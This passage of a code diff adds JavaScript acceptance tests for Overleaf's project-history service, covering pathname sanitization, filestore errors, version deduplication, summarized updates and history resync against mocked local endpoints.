this.timestamp, + '_main.tex', + '_main2.tex' + ), + olTextUpdate( + { id: doc.id, pathname: '_main2.tex' }, + this.userId, + this.timestamp, + [3, 'foo', 6], + 2 + ), + olRenameUpdate( + { id: doc.id, pathname: '_main2.tex' }, + this.userId, + this.timestamp, + '_main2.tex', + '_main__ASTERISK__.tex' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + doc, + this.userId, + this.timestamp, + doc.docLines + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + doc, + this.userId, + this.timestamp, + '/\\main.tex', + '/\\main2.tex' + ), + cb + ) + doc.pathname = '\\main2.tex' + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, doc, this.userId, 2, this.timestamp, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + doc, + this.userId, + this.timestamp, + '/\\main2.tex', + '/\\main*.tex' + ), + cb + ) + doc.pathname = '\\main*.tex' + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should workaround pathnames beginning with spaces', function (done) { + const doc = { + id: this.doc.id, + pathname: 'main.tex', + hash: 'b07b6b7a27667965f733943737124395c7577bea', + docLines: 'aaabbbccc', + length: 9, + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${doc.hash}`) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate( + { id: doc.id, pathname: 'main.tex' }, + this.userId, + this.timestamp, + doc.hash + ), + olRenameUpdate( + { id: doc.id }, + this.userId, + this.timestamp, + 'main.tex', + 'foo/__SPACE__main.tex' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + doc, + this.userId, + this.timestamp, + doc.docLines + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + doc, + this.userId, + this.timestamp, + '/main.tex', + '/foo/ main.tex' + ), + cb + ) + doc.pathname = '/foo/ main.tex' + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('with bad response from filestore', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should return a 500 if the filestore returns a 500', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(500) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${file.hash}`, file.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject( + this.projectId, + { allowErrors: true }, + (error, res) => { + if (error) { + return cb(error) + } + expect(res.statusCode).to.equal(500) + cb() + } + ) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + assert( + !createBlob.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + done() + } + ) + }) + + it('should return a 500 if the filestore request errors', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .replyWithError('oh no!') + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${file.hash}`, file.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject( + this.projectId, + { allowErrors: true }, + (error, res) => { + if (error) { + return cb(error) + } + expect(res.statusCode).to.equal(500) + cb() + } + ) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + assert( + !createBlob.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + done() + } + ) + }) + }) + + describe('with an existing projectVersion field', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: { projectVersion: '100.0' }, + changes: [], + }, + }, + }) + }) + + it('should discard project structure updates which have already been applied', function (done) { + const newDoc = [] + for (let i = 0; i <= 2; i++) { + newDoc[i] = { + id: new ObjectId().toString(), + pathname: `/main${i}.tex`, + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + docLines: 'a\nb', + } + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${newDoc[0].hash}`) + .times(3) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdateWithVersion( + newDoc[1], + this.userId, + this.timestamp, + newDoc[1].hash, + '101.0' + ), + olAddDocUpdateWithVersion( + newDoc[2], + this.userId, + this.timestamp, + newDoc[2].hash, + '102.0' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdateWithVersion( + historyId, + newDoc[0], + this.userId, + this.timestamp, + newDoc[0].docLines, + '100.0' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdateWithVersion( + historyId, + newDoc[1], + this.userId, + this.timestamp, + newDoc[1].docLines, + '101.0' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdateWithVersion( + historyId, + newDoc[2], + this.userId, + this.timestamp, + newDoc[2].docLines, + '102.0' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('with an existing docVersions field', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: { v2DocVersions: { [this.doc.id]: { v: 100 } } }, // version 100 below already applied + changes: [], + }, + }, + }) + }) + + it('should discard doc updates which have already been applied', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [6, 'baz', 2], + 101 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 100, + this.timestamp, + [ + { p: 3, i: 'foobar' }, // these ops should be skipped + { p: 6, d: 'bar' }, + ] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 101, + this.timestamp, + [ + { p: 6, i: 'baz' }, // this op should be applied + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/SummarisedUpdatesTests.js b/services/project-history/test/acceptance/js/SummarisedUpdatesTests.js new file mode 100644 index 0000000..5e8b57e --- /dev/null +++ b/services/project-history/test/acceptance/js/SummarisedUpdatesTests.js @@ -0,0 +1,249 @@ +/* eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import sinon from 'sinon' +import { expect } from 'chai' +import Settings from '@overleaf/settings' +import request from 'request' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('Summarized updates', function () { + beforeEach(function (done) { + this.projectId = new ObjectId().toString() + this.historyId = new ObjectId().toString() + return ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + return ProjectHistoryClient.initializeProject( + this.historyId, + (error, olProject) => { + if (error != null) { + throw error + } + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: olProject.id } }, + }) + + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/3/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + + return done() + } + ) + }) + }) + + afterEach(function () { + return nock.cleanAll() + }) + + it('should return the latest summarized updates from a single chunk', function (done) { + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { min_count: 1 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates).to.deep.equal({ + nextBeforeTimestamp: 6, + updates: [ + { + fromV: 6, + toV: 8, + meta: { + users: ['5a5637efdac84e81b71014c4', 31], + start_ts: 1512383567277, + end_ts: 1512383572877, + }, + pathnames: ['bar.tex', 'main.tex'], + project_ops: [], + labels: [], + }, + ], + }) + return done() + } + ) + }) + + it('should return the latest summarized updates, with min_count spanning multiple chunks', function (done) { + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { min_count: 5 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates).to.deep.equal({ + updates: [ + { + fromV: 6, + toV: 8, + meta: { + users: ['5a5637efdac84e81b71014c4', 31], + start_ts: 1512383567277, + end_ts: 1512383572877, + }, + pathnames: ['bar.tex', 'main.tex'], + project_ops: [], + labels: [], + }, + { + fromV: 5, + toV: 6, + meta: { + users: [31], + start_ts: 1512383366120, + end_ts: 1512383366120, + }, + pathnames: [], + project_ops: [ + { + atV: 5, + rename: { + pathname: 'foo.tex', + newPathname: 'bar.tex', + }, + }, + ], + labels: [], + }, + { + fromV: 2, + toV: 5, + meta: { + users: [31], + start_ts: 1512383313724, + end_ts: 1512383362905, + }, + pathnames: ['foo.tex'], + project_ops: [], + labels: [], + }, + { + fromV: 1, + toV: 2, + meta: { + users: [31], + start_ts: 1512383246874, + end_ts: 1512383246874, + }, + pathnames: [], + project_ops: [ + { + atV: 1, + rename: { + pathname: 'bar.tex', + newPathname: 'foo.tex', + }, + }, + ], + labels: [], + }, + { + fromV: 0, + toV: 1, + meta: { + users: [31], + start_ts: 1512383015633, + end_ts: 1512383015633, + }, + pathnames: ['main.tex'], + project_ops: [], + labels: [], + }, + ], + }) + return done() + } + ) + }) + + it('should return the summarized updates from a before version at the start of a chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { before: 4 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates.updates[0].toV).to.equal(4) + return done() + } + ) + }) + + it('should return the summarized updates from a before version in the middle of a chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { before: 5 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates.updates[0].toV).to.equal(5) + return done() + } + ) + }) + + return it('should return the summarized updates from a before version at the end of a chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { before: 6 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates.updates[0].toV).to.equal(6) + return done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/SyncTests.js b/services/project-history/test/acceptance/js/SyncTests.js new file mode 100644 index 0000000..89e002d --- /dev/null +++ b/services/project-history/test/acceptance/js/SyncTests.js @@ -0,0 +1,1543 @@ +import async from 'async' +import nock from 'nock' +import { expect } from 'chai' +import request from 'request' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import sinon from 'sinon' +import { getFailure } from './helpers/ProjectHistoryClient.js' +const { ObjectId } = mongodb + +const EMPTY_FILE_HASH = 'e69de29bb2d1d6434b8b29ae775ad8c2e48c5391' + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +describe('Syncing with web and doc-updater', function () { + const historyId = new ObjectId().toString() + let loggerWarn, loggerError + beforeEach(function () { + loggerWarn = sinon.spy(logger, 'warn') + loggerError = sinon.spy(logger, 'error') + }) + afterEach(function () { + loggerWarn.restore() + loggerError.restore() + }) + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + this.project_id = new ObjectId().toString() + this.doc_id = new ObjectId().toString() + this.file_id = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('resyncing project history', function () { + describe('without project-history enabled', function () { + beforeEach(function () { + MockWeb().post(`/project/${this.project_id}/history/resync`).reply(404) + }) + + it('404s if project-history is not enabled', function (done) { + request.post( + { + url: `http://127.0.0.1:3054/project/${this.project_id}/resync`, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(404) + done() + } + ) + }) + }) + + describe('with project-history enabled', function () { + beforeEach(function () { + MockWeb().post(`/project/${this.project_id}/history/resync`).reply(204) + }) + + describe('when a doc is missing', function () { + it('should send add doc updates to the history store', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedDoc: { hash: EMPTY_FILE_HASH, stringLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + MockHistoryStore() + .get(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`) + .reply(200, '') + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`, '') + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + file: { + hash: EMPTY_FILE_HASH, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [ + { path: '/main.tex', doc: this.doc_id }, + { path: '/persistedDoc', doc: 'other-doc-id' }, + ], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('when a file is missing', function () { + it('should send add file updates to the history store', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(404) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + it('should skip HEAD on blob without hash', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/undefined`) + .reply(500) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + !headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + it('should record error when checking blob fails with 500', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(500) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject( + this.project_id, + { + allowErrors: true, + }, + (err, res) => { + if (err) return cb(err) + assert(res.statusCode === 500, 'resync should have failed') + cb() + } + ) + }, + ], + error => { + if (error) { + throw error + } + assert( + loggerError.calledWithMatch( + sinon.match.any, + 'error checking whether blob exists' + ), + 'error logged on 500' + ) + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/changes should have been skipped` + ) + done() + } + ) + }) + it('should skip blob write when blob exists', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + it('should add file w/o url', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + describe('with filestore disabled', function () { + before(function () { + Settings.apis.filestore.enabled = false + }) + after(function () { + Settings.apis.filestore.enabled = true + }) + it('should record error when blob is missing', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .times(3) // three retries + .reply(404) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + 